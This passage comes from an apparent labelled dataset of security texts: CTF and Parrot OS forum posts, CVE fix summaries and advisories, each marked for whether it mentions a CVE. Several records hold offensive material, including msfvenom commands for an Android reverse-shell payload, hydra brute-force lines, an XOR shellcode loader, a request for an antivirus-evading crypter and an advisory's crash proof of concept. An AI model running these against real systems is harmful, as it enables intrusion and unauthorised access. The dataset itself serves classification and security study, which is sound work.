thinking you have to use anyone’s exact syntax. As I said, I think this might change person to person. Find the injection point, you’ll know you’re getting close when you get ‘malicious request detected’, but only for certain inputs. There is another spot on the site where this will be returned every time. Do not be fooled. Methodically go through and figure out what syntax is allowed for you, write it down, make a list. Write down exactly what error you get for each string you send through, there could be clues there. Try to get ‘ls’ working, so you can find where the flag.txt is I’d recommend actually using the buttons on the site and just intercepting them with Burp/ZAP, rather than using repeater, so you can actually see the results on the site. It’s slower, but I think I would have missed some things if I was just using repeater. One thing I haven’t seen people mention here is `` these things. They’re pretty cool. Just sayin.", "source": "hackthebox", "timestamp": "2022-10-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2435fae3535d6aebe718", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-06-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "85271f7f5bd71129e26e", "text": "CVE: CVE-2022-0159\n\n[{'lang': 'en', 'value': \"orchardcore is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\"}]\n\nFix commit: Fix encoding issues (#11008)", "source": "cvefixes", "timestamp": "2022-01-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "25ec2db2ab862d27cea2", "text": "I’m also struggling with logging in via SSH. See the screenshot for my attempts and the last one is me pasting the password in to show that it’s the correct password. Screenshot 2023-06-26 141758 1020×803 74.1 KB The instructions for how to connect via SSH (at the bottom of the screenshot) looks to be missing the IP address so I might be using the wrong IP address. Has anyone also had this issue?", "source": "hackthebox", "timestamp": "2023-06-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "752ce8268764ecbecce4", "text": "CVE: CVE-2022-0407\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4219: reading before the start of the line\n\nProblem: Reading before the start of the line.\nSolution: Check boundary before trying to read the character.", "source": "cvefixes", "timestamp": "2022-01-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "03a103d70cc4ffccd8fd", "text": "CVE: CVE-2021-20224\n\n[{'lang': 'en', 'value': \"An integer overflow issue was discovered in ImageMagick's ExportIndexQuantum() function in MagickCore/quantum-export.c. Function calls to GetPixelIndex() could result in values outside the range of representable for the 'unsigned char'. When ImageMagick processes a crafted pdf file, this could lead to an undefined behaviour or a crash.\"}]\n\nFix commit: https://github.com/ImageMagick/ImageMagick/pull/3083", "source": "cvefixes", "timestamp": "2022-08-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a5811960730ac43a9558", "text": "CVE: CVE-2022-29968\n\n[{'lang': 'en', 'value': 'An issue was discovered in the Linux kernel through 5.17.5. io_rw_init_file in fs/io_uring.c lacks initialization of kiocb->private.'}]\n\nFix commit: io_uring: fix uninitialized field in rw io_kiocb\n\nio_rw_init_file does not initialize kiocb->private, so when iocb_bio_iopoll\nreads kiocb->private it can contain uninitialized data.\n\nFixes: 3e08773c3841 (\"block: switch polling to be bio based\")\nSigned-off-by: Joseph Ravichandran \nSigned-off-by: Jens Axboe ", "source": "cvefixes", "timestamp": "2022-05-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0b01ad0328f3a4e314e5", "text": "Integer overflows in Tensorflow\n\n[Severity: HIGH]\n\n### Impact \nThe [implementations of `Sparse*Cwise*` ops](https://github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/sparse_dense_binary_op_shared.cc) are vulnerable to integer overflows. These can be used to trigger large allocations (so, OOM based denial of service) or `CHECK`-fails when building new `TensorShape` objects (so, assert failures based denial of service):\n\n```python\nimport tensorflow as tf\nimport numpy as np\n\ntf.raw_ops.SparseDenseCwiseDiv(\n sp_indices=np.array([[9]]),\n sp_values=np.array([5]),\n sp_shape=np.array([92233720368., 92233720368]),\n dense=np.array([4]))\n```\n\nWe are missing some validation on the shapes of the input tensors as well as directly constructing a large `TensorShape` with user-provided dimensions. The latter is an instance of [TFSA-2021-198](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-198.md) (CVE-2021-41197) and is easily fixed by replacing a call to `TensorShape` constructor with a call to `BuildTensorShape` static helper factory.\n\n### Patches\nWe have patched the issue in GitHub commits [1b54cadd19391b60b6fcccd8d076426f7221d5e8](https://github.com/tensorflow/tensorflow/commit/1b54cadd19391b60b6fcccd8d076426f7221d5e8) and [e952a89b7026b98fe8cbe626514a93ed68b7c510](https://github.com/tensorflow/tensorflow/commit/e952a89b7026b98fe8cbe626514a93ed68b7c510).\n\nThe fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Faysal Hossain Shezan from University of Virginia.", "source": "github_advisory", "timestamp": "2022-02-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "48c257bdb4229396cf74", "text": "CVE: CVE-2022-31046\n\n[{'lang': 'en', 'value': 'TYPO3 is an open source web content management system. Prior to versions 7.6.57 ELTS, 8.7.47 ELTS, 9.5.34 ELTS, 10.4.29, and 11.5.11, the export functionality fails to limit the result set to allowed columns of a particular database table. This way, authenticated users can export internal details of database tables they already have access to. TYPO3 versions 7.6.57 ELTS, 8.7.47 ELTS, 9.5.34 ELTS, 10.4.29, 11.5.11 fix the problem described above. In order to address this issue, access to mentioned export functionality is completely denied for regular backend users.'}]\n\nFix commit: [SECURITY] Restrict export functionality to allowed users\n\nThe import functionality of the import/export module is already\nrestricted to admin users or users, who explicitly have access through\nthe user TSConfig setting \"options.impexp.enableImportForNonAdminUser\".\n\nThe export functionality has the following security drawbacks:\n\n* Export for editors is not limited on field level\n* The \"Save to filename\" functionality saves to a shared folder, which\n other editors with different access rights may have access to.\n\nBoth issues are not easy to resolve and also the target audience for\nthe Import/Export functionality are mainly TYPO3 admins.\n\nTherefore, now also the export functionality is restricted to TYPO3\nadmin users and to users, who explicitly have access through the new\nuser TSConfig setting \"options.impexp.enableExportForNonAdminUser\".\n\nAdditionally, the contents of the temporary \"importexport\" folder in\nfile storages is now only visible to users who have access to the\nexport functionality.\n\nIn general, it is recommended to only install the Import/Export\nextension when the functionality is required.\n\nResolves: #94951\nReleases: main, 11.5, 10.4\nChange-Id: Iae020baf051aeec0613366687aa8ebcbf9b3d8b2\nSecurity-Bulletin: TYPO3-CORE-SA-2022-001\nSecurity-References: CVE-2022-31046\nReviewed-on: https://review.typo3.org/c/Packages/TYPO3.CMS/+/74902\nTested-by: Oliver Hader \nReviewed-by: Oliver Hader ", "source": "cvefixes", "timestamp": "2022-06-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "637fc6698b4a9c38a4cd", "text": "Hi everyone, loving it so far One thing is troubling me, though. I solved “More Secrets” without solving “Secret Message” first… What did I do wrong? Are we dealing with the same files, or is this first challenge about something completely different, that I missed in my enum? Thanks a lot!", "source": "hackthebox", "timestamp": "2023-10-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7b26a4d266fdd37dddd3", "text": "Metasploit: Android Payload not working\n\nHi, Using Metasploit in parrot os. Tried to generate a payload for my android device (on the same network), app installation is successful but not openning, instead showing a message: image 720×477 85.8 KB Commands I used to generate the file: msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.10.10 lport=8484 -o /home/octothorpe/payload/Hi.apk[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload No encoder specified, outputting raw payload Payload size: 10187 bytes Saved as: /home/user/Hi.apk After: msfconsole use exploit/multi/handler [msf](Jobs:0 Agents:0) exploit(multi/handler) >> set payload android/meterpreter/reverse_tcp set lhost myip set lport portnumber exploit -j after hitting enter and typing sessions -i it results: No active sessions.", "source": "parrotsec", "timestamp": "2022-04-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "30043c5563abb1a492d6", "text": "i was having a similar issue with the question ‘How many files exist on the system that have the “.bak” extension?’ where i kept getting 1 as the answer until i realized i didnt ssh to the target than i got the correct answer of 4", "source": "hackthebox", "timestamp": "2022-07-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c35ef8243edc7a4eb6dc", "text": "CVE: CVE-2022-32323\n\n[{'lang': 'en', 'value': 'AutoTrace v0.40.0 was discovered to contain a heap overflow via the ReadImage function at input-bmp.c:660.'}]\n\nFix commit: Merge pull request #72 from lemenkov/misleading_indentation\n\nMisleading indentation", "source": "cvefixes", "timestamp": "2022-07-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "882389bb731065ae7ae3", "text": "If anyone still has some new nudges or something. Already spending a few days on this module but still not the rsults i was hoping for. At this moment I am working on assessment 1, question 2.", "source": "hackthebox", "timestamp": "2023-11-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "90c2bb441679efdd79d0", "text": "Malware Analysis & Reverse Engineering CTF\n\nHi, I’m studying Penetration Testing and part of the training obviously focuses on solving CTF challenges. You must be asking yourself how the name of the title is related to PT? Well, it’s probably not that related, but there is a challenge that really caught my attention and I’ve been trying to solve it for a long time without success. The challenge contains a malicious file and the task is to investigate the file and find the FLAG hidden inside the file. So I will detail a bit about the malware and what I was able to understand from the code: Code details: Assembly - Assembly code - Pastebin.com (IDA PRO) What I understood: First of all, this is an executable file for Windows (EXE) and when I run the software in CMD I get an error “An error occurred” and the operation ends. Reading the code through IDA PRO you can see an Environment Variable called GREENIE, in my opinion everything starts here, and if I manage to discover the value of GREENIE I can move forward. It is also possible to notice other generic errors that exist in the software. I know that to solve the challenge, I would have to set up the environment properly and then follow the code, but I would need some direction because I am missing something. I got some guidance from someone who told me to learn about ENDIANNES, with emphasis on LITTLE ENDIAN. I read about it and the differences between BIG ENDIAN and LITTLE ENDIAN, but I couldn’t really understand how it is reflected in the software. I would appreciate and thank anyone who takes the time to help. Download link for the software: https://easyupload.io/ikpzq3 It is important to know that this is software that is detected as MALWARE by Windows Defender, so it is recommended to open it in a virtual system. Thank you!", "source": "hackthebox", "timestamp": "2023-01-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "350b04a1e95be75a934b", "text": "Metasploit crypter to make FUD file\n\nHi guys any tools on parrot OS which I can make my apk file FUD? Could be as well in metasploit with am not very familiar but learning.", "source": "parrotsec", "timestamp": "2022-01-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "626b6c3a24f720698cec", "text": "Yes, I finally got it thanks to your hint! But please enlighten me: netstat -antp | grep -i , as suggested in the course module won’t show that that service exposed on the localhost. What is the correct synthax to use netstat to identify the open port on localhost?", "source": "hackthebox", "timestamp": "2022-03-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bd2b31887f91108c1dc7", "text": "OpenStack Glance v2 API unrestricted path traversal through filesystem:// scheme\n\n[Severity: MEDIUM]\n\nThe V2 API in OpenStack Image Registry and Delivery Service (Glance) before 2014.1.4 and 2014.2.x before 2014.2.2 allows remote authenticated users to read or delete arbitrary files via a full pathname in a `filesystem://` URL in the image location property. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-9493.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c8702bb5b6ffe3fe164c", "text": "I can’t get this one after many days. I have created a password list with cupp using the name harry potter with leet mode on. I filtered the passwords to 8 character max, no numbers, no special characters. I created a username list with Harry Potter. hydra -L harry_usernames.txt -P harry.txt -u -f ssh://167.99.89.198:22 -t 4 any ideas?", "source": "hackthebox", "timestamp": "2022-01-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e2353b8f0c40bbaca3c1", "text": "Anonsurf CLI not responding as expected\n\nWhen I try to run anonsurf CLI with: sudo anonsurf start It opens a GUI dialog of do you want to Kill ******* Applications, and clicks on the box dont work… On clikcing KILL the computer hangs and freezes the app (terminal)… I think previous interface of anonsurf was good, It asked the (kill…apps) in the CLI mode and works there NO GUI… As the clicks are not working I have to run anonsurf with anonsurf GUI. Please guide me what to do?", "source": "parrotsec", "timestamp": "2023-11-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "6cb2f07682cdc537c923", "text": "Vaadin vulnerable to possible information disclosure of class and method names in RPC response\n\n[Severity: LOW]\n\n### Description\nPossible information disclosure in Vaadin 10.0.0 to 10.0.23, 11.0.0 to 14.10.1, 15.0.0 to 22.0.28, 23.0.0 to 23.3.13, 24.0.0 to 24.0.6, 24.1.0.alpha1 to 24.1.0.rc2, resulting in potential information disclosure of class and method names in RPC responses by sending modified requests.\n\nhttps://vaadin.com/security/cve-2023-25500", "source": "github_advisory", "timestamp": "2023-06-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4ef169fdb0e31da46c76", "text": "If you are genuine learner don’t feel bad . I can help you via some website … These sites have advanced graphical future so you can just learn how much you want to know about hacking … One you got the basics like programming, H/w , commands lets dive to practical section . My selected list have both theory and practical section where you can practice without other platform help . Or also can interact with these site with vpn :-- So don’t think you need a paid platform just go with free that also a hacking skills …The matter hackers doesn’t need other’s help for get anything from web … The site are Here … Learn and all the best ! Cyber:- INE HBT open the wire 4,try hack me 5.portswigger 6.open the wire program:- 1.w3schools.com skills you need 1.python 2.unix/linux 3.network 4.hardware 5.internet thing you need any device have linux or correspondent distributions like parrot , redhat", "source": "parrotsec", "timestamp": "2022-03-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bbd89c35e7a2d398e593", "text": "The ‘<’ characters may be blacklisted by the server, that’s probably why the second payload is not working", "source": "hackthebox", "timestamp": "2023-05-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bc640b61ca4ac216da8f", "text": "[Improper Access Control - Generic] DNS rebinding in --inspect (insufficient fix of CVE-2022-32212 affecting macOS devices)\n\nThe fix for CVE-2022-32212, covered the cases for routable IP addresses, however, there exists a specific behavior on macOS devices when handling the `http://0.0.0.0` URL that allows an attacker-controlled DNS server to bypass the DNS rebinding protection by resolving hosts in the `.local` domain.\n\n[Original HackerOne report](https://hackerone.com/reports/1632921)\n\n[Node.js Blog](https://nodejs.org/en/blog/vulnerability/september-2022-security-releases/#dns-rebinding-in-inspect-insufficient-fix-of-cve-2022-32212-affecting-macos-devices-high-cve-2022-32212-cve-2018-7160)\n\n## Impact\n\nAttacker with access to a compromised DNS server or the ability to spoof its responses can gain access to the Node.js debugger, which can result in remote code execution.", "source": "hackerone", "timestamp": "2023-01-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "936c5bf4d00cb96f30ad", "text": "It seems like you are participating in a capture-the-flag (CTF) or penetration testing challenge and are trying to find specific flags on a target system.", "source": "hackthebox", "timestamp": "2023-08-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0e64cd19f53b63748fa5", "text": "Hi all ! I started JET Fortress and got 3 first flag. Now im stuck for Bypass Authentication. Im looking for someone who want to help me please.", "source": "hackthebox", "timestamp": "2023-01-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9210e8dec3b80d8fa073", "text": "i am still stuck on the first question of the assessment, which wordlist do i need to use?", "source": "hackthebox", "timestamp": "2023-06-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "96b39817c9155ad1c702", "text": "stuck on the very last steps. I have literraly everything , the username , the password list , but it doesn’t work. it’s so annoying and not fun Edit: just solved it , it takes literraly more than 20 minutes to bruteforce it with 4 threads. boring. dont waste more time on it : hydra -l [user you found] -P [hint] -u -f ftp://127.0.0.1 -t 4", "source": "hackthebox", "timestamp": "2023-05-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bd99db8e137d811372bd", "text": "this hint is the key to the kingdom. Once you determine the vulnerability and can can make the exploit work in gdb (i.e. you get an unprivileged shell), get out of gdb and just run your exploit as an argument to the vulnerable binary–don’t forget to start your listener.", "source": "hackthebox", "timestamp": "2022-09-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f5cd613b70521fc1bac4", "text": "CVE: CVE-2022-27463\n\n[{'lang': 'en', 'value': 'Open redirect vulnerability in objects/login.json.php in WWBN AVideo through 11.6, allows attackers to arbitrarily redirect users from a crafted url to the login page.'}]\n\nFix commit: Open Redirect fix, thanks Max Boll", "source": "cvefixes", "timestamp": "2022-04-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e01d32330a7c903a1f7c", "text": "You’ve worked a great way! Have you tried sudo apt install firefox ?", "source": "parrotsec", "timestamp": "2022-02-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "55b2683f8b86531de25d", "text": "CVE: CVE-2022-29529\n\n[{'lang': 'en', 'value': 'An issue was discovered in MISP before 2.4.158. There is stored XSS via the LinOTP login field.'}]\n\nFix commit: fix: [security] XSS in LinOTP login field fixed\n\n- fixed a stored XSS in the LinOTP login\n- also fixed invalid calls to check MISP settings from a javascript scope\n\n- as reported by Dawid Czarnecki of Zigrin Security", "source": "cvefixes", "timestamp": "2022-04-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9b8ff23921a8537a425e", "text": "With ‘man uname’ you will be able to see your options You can show all info available, or use a simple aproach I used uname -r Don’t forget to write exacted what you were asked for", "source": "hackthebox", "timestamp": "2022-11-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1fd03811663a1304085c", "text": "[Integer Overflow] Integer overflows in unescape_word()\n\n## Summary:\nA similiar issue to [CVE-2019-5435](https://hackerone.com/reports/547630)\n\n## Steps To Reproduce:\n### analysis\nDICT protocol can use one url like \"dict://localhost:3306\", and function unescape_word() is used to deal with the character in url like this comment\n```c\n /* According to RFC2229 section 2.2, these letters need to be escaped with\n \\[letter] */\n if((ch <= 32) || (ch == 127) ||\n (ch == '\\'') || (ch == '\\\"') || (ch == '\\\\')) {\n dictp[olen++] = '\\\\';\n }\n```\n\nand the bug case here /curl/lib/dict.c\n\n```c\nstatic char *unescape_word(const char *inputbuff)\n{\n char *newp = NULL;\n char *dictp;\n size_t len;\n\n CURLcode result = Curl_urldecode(inputbuff, 0, &newp, &len, <------------- get len\n REJECT_NADA);\n if(!newp || result)\n return NULL;\n\n dictp = malloc(len*2 + 1); <------------ overflow here\n//.....\n}\n```\n\nIn my analysis(maybe wrong), the `inputbuff` in DICT url is \"dict:[inputbuff]\", for example \"//localhost:3306\" in \"dict://localhost:3306\", and `len` is the length of `inputbuff`.\n\nAnd the length of `inputbuff` multiplied by 2 and then passed to malloc. This may lead to a integer overflow on a 32bit OS when the inputbuff is longer than 2GB\n\n`unescape_word` was called by dict_do(), If someone use libcurl to code, and call dict_do() with a extreme long url, it might be triggered.\n\n## Impact\n\nIt might leads to a crash or some other impact.", "source": "hackerone", "timestamp": "2022-06-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5f40a780a9c17bfc08ec", "text": "I have a requirement to open ten random files in a directory(its not a single directory, it is multi directory structure.)", "source": "go4expert", "timestamp": "2022-04-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8fef6d90bda6ccbac4d6", "text": "My approach is kinda similar to yours with the trust of task statement that decode the shellcode, by adding a loop to ‘xor’ each 8-bytes on the stack with the key in ‘rbx’ . global _start section .text _start: mov rax,0xa284ee5c7cde4bd7 push rax mov rax,0x935add110510849a push rax mov rax,0x10b29a9dab697500 push rax mov rax,0x200ce3eb0d96459a push rax mov rax,0xe64c30e305108462 push rax mov rax,0x69cd355c7c3e0c51 push rax mov rax,0x65659a2584a185d6 push rax mov rax,0x69ff00506c6c5000 push rax mov rax,0x3127e434aa505681 push rax mov rax,0x6af2a5571e69ff48 push rax mov rax,0x6d179aaff20709e6 push rax mov rax,0x9ae3f152315bf1c9 push rax mov rax,0x373ab4bb0900179a push rax mov rax,0x69751244059aa2a3 push rax mov rbx,0x2144d2144d2144d2 _loop_setup: mov rcx, 14 lea rdx, [rsp] _loop: xor [rdx], rbx add rdx, 8 loop _loop _exec_shellcode: call rsp _exit: mov rax, 60 mov rdi, 0 syscall The patched program is then linked with stack execution enable: $ nasm -f elf64 loaded_shellcode_patched.nasm $ ld -z execstack -o loaded_shellcode_patched loaded_shellcode_patched.o Unfortunately, the decoded shellcode doesn’t look good: Dump of assembler code from 0x7fffffffe300 to 0x7fffffffe370: 0x00007fffffffe300: jno 0x7fffffffe2e8 0x00007fffffffe302: mov $0x31c05048,%ebx 0x00007fffffffe307: rex.W 0x00007fffffffe308: rex.W push %rbx 0x00007fffffffe30a: and %eax,0x66(%rdi,%rbp,4) 0x00007fffffffe30e: jle 0x7fffffffe326 0x00007fffffffe310: sbb 0x23467c7a(%rbp),%esi 0x00007fffffffe316: cmpsl %es:(%rdi),%ds:(%rsi) 0x00007fffffffe317: mov $0xbf264d34,%ebx 0x00007fffffffe31c: mov $0x9a4c5348,%ebx 0x00007fffffffe321: mov $0x77435348,%ebx 0x00007fffffffe326: mov $0x4b,%dh 0x00007fffffffe328: push %rbx 0x00007fffffffe329: adc -0x19(%rcx),%dh 0x00007fffffffe32c: and %dh,(%rsi) 0x00007fffffffe32e: movsxd (%rax),%edx 0x00007fffffffe330: rclb %cl,-0x442dbbdf(,%rcx,2) 0x00007fffffffe337: rex.W add $0xc1,%al 0x00007fffffffe33a: or $0x31,%cl 0x00007fffffffe33d: and %rax,0x48(%rbx,%rax,4) 0x00007fffffffe342: (bad) 0x00007fffffffe343: xor %ecx,-0x19(%rax) 0x00007fffffffe346: mov %ecx,-0x50(%rax) 0x00007fffffffe349: shlb $0x48,(%rcx) 0x00007fffffffe34c: mul %edx 0x00007fffffffe34e: or %al,%bh 0x00007fffffffe350: add %rsi,0x4831ff40(%rdi) 0x00007fffffffe357: add %edx,%edx 0x00007fffffffe359: xor %ecx,-0x1a(%rax) 0x00007fffffffe35c: mov %ecx,-0xa(%rax) 0x00007fffffffe35f: xor %ecx,-0x40(%rax) 0x00007fffffffe362: xor %ecx,0x5(%rax) 0x00007fffffffe365: nopl 0x31ff0f05(%rdx) 0x00007fffffffe36c: rex.W cmp $0xc0,%al 0x00007fffffffe36f: addl $0x0,(%rcx) End of assembler dump. You can see that there is plenty of register-based memory access, which would be invalid as most of the registers are initialized with the value 0. Also jno 0x7fffffffe2e8 will be taken when yielding the control flow to the shellcode as the overflow flag in the rflags register are set to 0 by default, which will jump the control flow to a lower address in the stack with all-zero initialized values. Given 00 00 is a valid instruction in x86_64 representing add [rax], al , the shellcode would attempt to dereference the default value 0x00 in rax after the jump which leads to a segfault. Therefore, either decode the shellcode, by adding a loop to ‘xor’ each 8-bytes on the stack with the key in ‘rbx’ is misleading, or there should be a specific environment with non-default register values where the shellcode should execute.", "source": "hackthebox", "timestamp": "2023-10-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9eef7f1fb82fe1b08304", "text": "Nomad ACL Policies without Label are Applied to Unexpected Resources\n\n[Severity: MEDIUM]\n\nA vulnerability was identified in Nomad, an ACL policy using a block without label may be applied to unexpected resources. This vulnerability, CVE-2023-3072, affects Nomad from 0.7 up to 1.5.6 and 1.4.10 and was fixed in 1.6.0, 1.5.7, and 1.4.11.", "source": "github_advisory", "timestamp": "2023-07-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d59796d30709ac31ebaa", "text": "Beef-xss testing on vbox from host machine\n\nNot sure If I fit in good category, if not please mod change it. I play with Beef xss, it’s really interesting tool. I installed windows on virtualbox to test it further, I put local link generated from Beef-xss on vbox windows browser and it does not load local link. My vbox network settings are >bridged Adapter>Wlan0. Anyone could tell me what I doing wrong setting my windows lab that it does not load localhost links? `# This site can’t be reached 127.0.0.1 refused to connect.`", "source": "parrotsec", "timestamp": "2022-02-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1551f408dae1bbadece0", "text": "I pulled out all my hair during this exercise. WIthout the specific hint to look for the string johneverist: ‘malicious request’ within the >1000 lines HTTP-response, I would have never figured out any reaction to command injection attemps. I can give one more recommendation: Look for different ways to start a sub-shell, as neither && not || worked for me!", "source": "hackthebox", "timestamp": "2022-01-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "13db2e595fc7c7cd5916", "text": "Hi All, Can someone give me a nudge or DM me for Secret Message? I know the tool to use and think I know the c****** that has been used but can’t bruteforce the passkey. Am I looking at this the wrong way… Any help appreciated! S", "source": "hackthebox", "timestamp": "2022-02-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d1549d8f8b9af34a394f", "text": "CVE: CVE-2022-0577\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository scrapy/scrapy prior to 2.6.1.'}]\n\nFix commit: Merge pull request from GHSA-cjvr-mfj7-j4j8\n\n* Do not carry over cookies to a different domain on redirect\n\n* Cover the cookie-domain redirect fix in the release notes\n\n* Cover 1.8.2 in the release notes\n\n* Fix redirect Cookie handling when the cookie middleware is disabled\n\n* Update the 1.8.2 release date", "source": "cvefixes", "timestamp": "2022-03-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "37811a90e4f1f862c658", "text": "So basically the WIFI UAV App sends 124 Bytes of Data. The 13th, 14th, 89th, 90th, 109th, and 110th byte are about time counter. Where 13 and 14 starts with 00, 89 and 90 starts with 01, and 109 and 110 starts with 02. For controlling, the 21st byte is left and right from 00 to FF where in the middle is 80 ( 126 decimal ) 22nd byte is forward and backward where backward from 00 and forward to FF 23th byte is throttle from 00 to FF 24th byte is for yaw from 00 to FF 25th byte is for command, where 01 takeoff, 02 emergency stop/killswitch, 03 landing, 04 Calibrate Gyro 26th byte is also command but for toggle between Headless mode and non-headless mode There must be many commands but i didnt found yet", "source": "hackthebox", "timestamp": "2023-11-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b49bca84b6b33c725ec1", "text": "CVE: CVE-2022-29788\n\n[{'lang': 'en', 'value': 'libmobi before v0.10 contains a NULL pointer dereference via the component mobi_buffer_getpointer. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted mobi file.'}]\n\nFix commit: Fix issue with corrupt files with tagvalues_count = 0 that caused null pointer dereference", "source": "cvefixes", "timestamp": "2022-06-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5c538a4882e7a760f633", "text": "for to get flag 5 you can use LES (Linux Exploit Suggester). I know it’s a hint, so don’t hate me. Try every vulnerability that the script will offer you. github.com GitHub - The-Z-Labs/linux-exploit-suggester: Linux privilege escalation auditing tool Linux privilege escalation auditing tool", "source": "hackthebox", "timestamp": "2023-05-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e2ec6470b3b0213a0ba7", "text": "Yeah I’ve been mixing and matching on the operand injectors I did get something weird thought. I dont know if this is normal. I got the index.php and config.php to popup through the ‘ls’ command but still can’t find the flag. Screen Shot 2022-06-06 at 12.03.22 PM 1876×938 122 KB", "source": "hackthebox", "timestamp": "2022-06-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "36882c11c4addfba7a81", "text": "CVE: CVE-2022-0362\n\n[{'lang': 'en', 'value': 'SQL Injection in Packagist showdoc/showdoc prior to 2.10.3.'}]\n\nFix commit: bug", "source": "cvefixes", "timestamp": "2022-01-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "555a07aca83a7d7013bb", "text": "My network has been compromised and I need help\n\nI feel like an idiot and I need some help or advise. I’ve been slowly learning penetration testing.4 days ago I get a text message giving me a TFA code to reset my ring doorbell. I, nor anyone at my home requested a password reset. That’s when the problem started. I started having problems accessing some of my Proxmox network and I started getting messages from web sites telling me my IP has been blocked because of suspicious activity. That could have been caused by me scanning my network with Wireshark?? I tried using my tools in Parrot OS to solve this issue but things kept getting worse. I think my Spectrum SAC2V router was flagging me because I was scanning my network with Wireshark. I finally pulled the plug and disconnected from WAN. Now I fired back up my Proxmox cluster and one node is giving me a man in the middle attack warning on one node saying a key has been modified. This is very much a Parrot OS question because I have Parrot in 11 laptops and I had several Parrot VMs in Proxmox. I want to just wipe all 6 nodes that appear to be compromised, but I’m not learning by doing that. I have been trying to learn this trade , but I’ve focused more on learning Linux better before I got very deep in the Penetration testing learning. Is there any ethical hackers on here that can help me figure this out? I don’t want to just run a tool and let it fix this. What I’d really like is some step by step directions on where to start and exactly how to fix this with one of my Parrot OS laptops. I’m sorry for the long dissertation, but I learn best under pressure. And that’s where I’m at right now", "source": "parrotsec", "timestamp": "2022-03-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1850d04152f7e694f6ec", "text": "I only scanned with clamav, rkhunter. I was not running TOR or Anonsurf. This entire situation has taught me a valuable lesson. So I am starting over for the umpteenth timer. This time I am starting with the very basic network training. I’ve always been the type of person to jump in way over my head until I am ready to throw my hands up. then I go back to the basics and they seem to make so much more sense. Now I am having weird issues with the setup of my networking lab, switches and routers. these are not Parrot related so I am asking my questions in a different forum. Anyway, you guys are great. i appreciate all the help you’ve given me along the way. I am not going to give up, but I will be spending a lot less time using Parrot OS and learn my networking with a lab I am setting up of three old Thinkpads running Debian 11. I could use some advise on any good , structured (open source) network basic training if anyone has any suggestions? Parrot will always be my go to OS for future pentesting training and use though", "source": "parrotsec", "timestamp": "2022-04-05", 